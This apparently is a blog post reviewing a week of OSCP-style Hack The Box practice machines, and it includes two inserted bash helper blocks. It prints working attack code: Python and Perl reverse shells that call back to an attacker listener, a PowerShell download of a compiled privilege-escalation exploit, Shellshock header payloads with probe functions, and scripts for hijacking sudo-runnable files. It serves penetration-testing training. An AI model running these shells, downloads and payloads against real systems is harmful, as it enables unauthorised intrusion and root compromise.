An OSCP journey without using Metasploit - Weekly Review #1
I thought I would start week 2 with a review of week one. It is important not to steam ahead too fast, and to take some time to reflect on the lessons Hack The Box has taught us so far. This post points out some of the key tools, scripts and tips I used in the past week to get root on the boxes without using Metasploit.
Box 1 - Key methodology:
https://bit.ly/2yPStyJ. This box had one port open, 80 (HTTP). Gobuster found 10.10.10.68/dev/phpbash.php; this phpbash backdoor gave us RCE as the user www-data. The first logical step was to check which languages were present ("which python" / "which python3"). I then used the RSG tool from https://github.com/mthbernardes/rsg (spend time learning how to quickly generate a reverse or bind shell in at least Python, Perl and Bash). The shell then needed upgrading; I used: python -c 'import pty; pty.spawn("/bin/bash")'
For priv esc, I first ran "sudo -l". This showed that a user called scriptmanager had NOPASSWD: ALL, meaning we could run any sudo command as scriptmanager. All the files were owned by root, with the exception of a folder called scriptmanager. In it I found two files, one of which was being called from the other, and we replaced the text with the following Python code:
import socket,subprocess,os
# connect back to the attacker's listener (replace IP/port with your own)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.63",6666))
# point stdin, stdout and stderr at the socket, then hand them to an interactive shell
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Overall: Gobuster to enumerate sub-directories, RSG to write a reverse shell, python -c 'import pty; pty.spawn("/bin/bash")' to upgrade the shell, and sudo -l for priv esc (NOPASSWD).
Box 2 - Key methodology:
https://bit.ly/3cOUM3Z. This box had one port open (HTTP). I used telnet to retrieve the banner and identified the HTTP server as Apache 2.4.18, viewed the page source and found a comment that led to an open-source blog, used its GitHub page to find further information, and re-ran Gobuster against the newly discovered sub-directories. Remember to try obvious passwords.
For priv esc: sudo -l showed a script (monitor.sh) that could be run with sudo. Overwrite it so it spawns a shell, then run it via sudo:
echo "/bin/bash" > monitor.sh
sudo /path/to/monitor.sh
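Both the Box 1 (NOPASSWD: ALL as another user) and Box 2 (writable script runnable with sudo) escalations come straight out of `sudo -l`. The following added example, which is not code from the write-up, parses that output and flags the two cases, then performs the Box 2 overwrite. Paths and usernames in the comments are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): turn `sudo -l` output into a
# short list of what is worth chasing. A NOPASSWD: ALL entry means you can
# become that user outright; a NOPASSWD script you can write to means you
# control what root executes.

# Usage: writable_nopasswd_targets "$(sudo -l 2>/dev/null)"
writable_nopasswd_targets() {
  local sudo_output="$1" line runas spec target
  printf '%s\n' "$sudo_output" | grep 'NOPASSWD:' | while IFS= read -r line; do
    # Typical line: "    (root) NOPASSWD: /usr/local/bin/monitor.sh, /usr/bin/perl"
    runas=$(printf '%s' "$line" | sed -n 's/^[[:space:]]*(\([^)]*\)).*/\1/p')
    spec=${line#*NOPASSWD: }
    printf '%s\n' "$spec" | tr ',' '\n' | while IFS= read -r target; do
      # trim leading whitespace, drop any arguments, keep the program path
      target=$(printf '%s' "$target" | sed 's/^[[:space:]]*//; s/ .*$//')
      [ -n "$target" ] || continue
      if [ "$target" = ALL ]; then
        printf 'ALL as (%s): any command, e.g. sudo -u <user> /bin/bash\n' "$runas"
      elif [ -w "$target" ]; then
        printf 'WRITABLE as (%s): %s\n' "$runas" "$target"
      fi
    done
  done
}

# The Box 2 move: replace a sudo-runnable script with one that just execs bash.
# Keeps a backup so whatever the script did can be restored afterwards.
# Usage: hijack_sudo_script /path/to/monitor.sh && sudo /path/to/monitor.sh
hijack_sudo_script() {
  local script="$1"
  [ -w "$script" ] || { echo "not writable: $script" >&2; return 1; }
  cp -p "$script" "$script.bak" 2>/dev/null || true
  printf '#!/bin/bash\n/bin/bash\n' > "$script"
}
```

Note that `-w` answers for the current user only; if the script itself is read-only but its directory is writable, you can still replace it by moving it aside, which this check will not flag.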
Box 3 - Key methodology:
https://bit.ly/2Sefv9D. This box had two ports open, 21 and 80 (FTP and HTTP). Windows IIS servers typically run frameworks such as ASP or ASPX (.NET), so I created an ASPX reverse TCP payload with msfvenom. Once I had a foothold I ran the command "sysinfo", which returned: Enterprise | 6.1.7600 | Windows 7. Googling this I found a priv esc PoC for MS11-046 and compiled it with: i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32. I then used a Python web server (python -m SimpleHTTPServer 8080) to transfer the compiled binary to the victim. As wget and curl were not installed, I used PowerShell to download it:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
Box 4 - Key methodology:
https://bit.ly/2W53JPJ. This box had two ports open, 80 (HTTP) and 2222 (SSH). After running Gobuster and finding "cgi-bin", running ffuf with a custom wordlist found "user.sh" (the important takeaway here is to remember to also brute-force file extensions such as sh, php, asp, aspx, py, cgi and html). After a while we established that the Shellshock vulnerability was the pathway in. Main takeaways for Shellshock:
Shellshock is a bash remote code execution vulnerability. This vulnerability affected web servers utilising CGI (Common Gateway Interface), which is a system for generating dynamic web content. This usually involves directories such as /cgi-sys, /cgi-mod, /cgi-bin, etc. Here /cgi-sys and /cgi-mod do not exist on the web server; cgi-bin does.
A really good tool for Shellshock is commix (http://commixproject.com).
To test manually:
curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://xx.xx.xx.xx/cgi-bin/user.sh
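The manual test above works because CGI copies request headers into environment variables, and a vulnerable bash runs whatever follows a function definition it imports from the environment. The following added example, not code from the write-up, checks the local bash for the bug (CVE-2014-6271), builds the header value so the quoting is right, and wraps the curl probe. The target URL and command are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): Shellshock (CVE-2014-6271)
# helpers. Target URL and command are placeholders.

# Local check: a vulnerable bash executes code appended to a function
# definition imported from the environment. Returns 0 if vulnerable.
shellshock_local_check() {
  local out
  out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
  case "$out" in
    *VULNERABLE*) return 0 ;;
    *) return 1 ;;
  esac
}

# Build the header value to send to a CGI script. CGI copies request headers
# into environment variables (User-Agent -> HTTP_USER_AGENT), so a bash-based
# CGI imports the fake function and runs the trailing command. The two echo
# calls emit the blank line that terminates the HTTP headers so the command's
# output lands in the response body instead of producing a 500.
shellshock_header() {
  local cmd="$1"
  printf "() { :; }; echo; echo; /bin/bash -c '%s'" "$cmd"
}

# Send the probe (needs network access, so it is not exercised offline).
# Usage: shellshock_probe http://xx.xx.xx.xx/cgi-bin/user.sh 'id'
shellshock_probe() {
  local url="$1" cmd="$2"
  curl -s --connect-timeout 5 -H "User-Agent: $(shellshock_header "$cmd")" "$url"
}
```

Any header the server exports to the CGI environment works, not just User-Agent; Referer and Cookie are the usual alternatives when a WAF inspects the user agent. The command must avoid single quotes, since the builder wraps it in them.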
For priv esc (root): NOPASSWD: /usr/bin/perl was present in the sudoers output, so I ran a Perl reverse TCP shell through sudo (replace 10.0.0.1 and 1234 with your listener's IP and port):
sudo perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'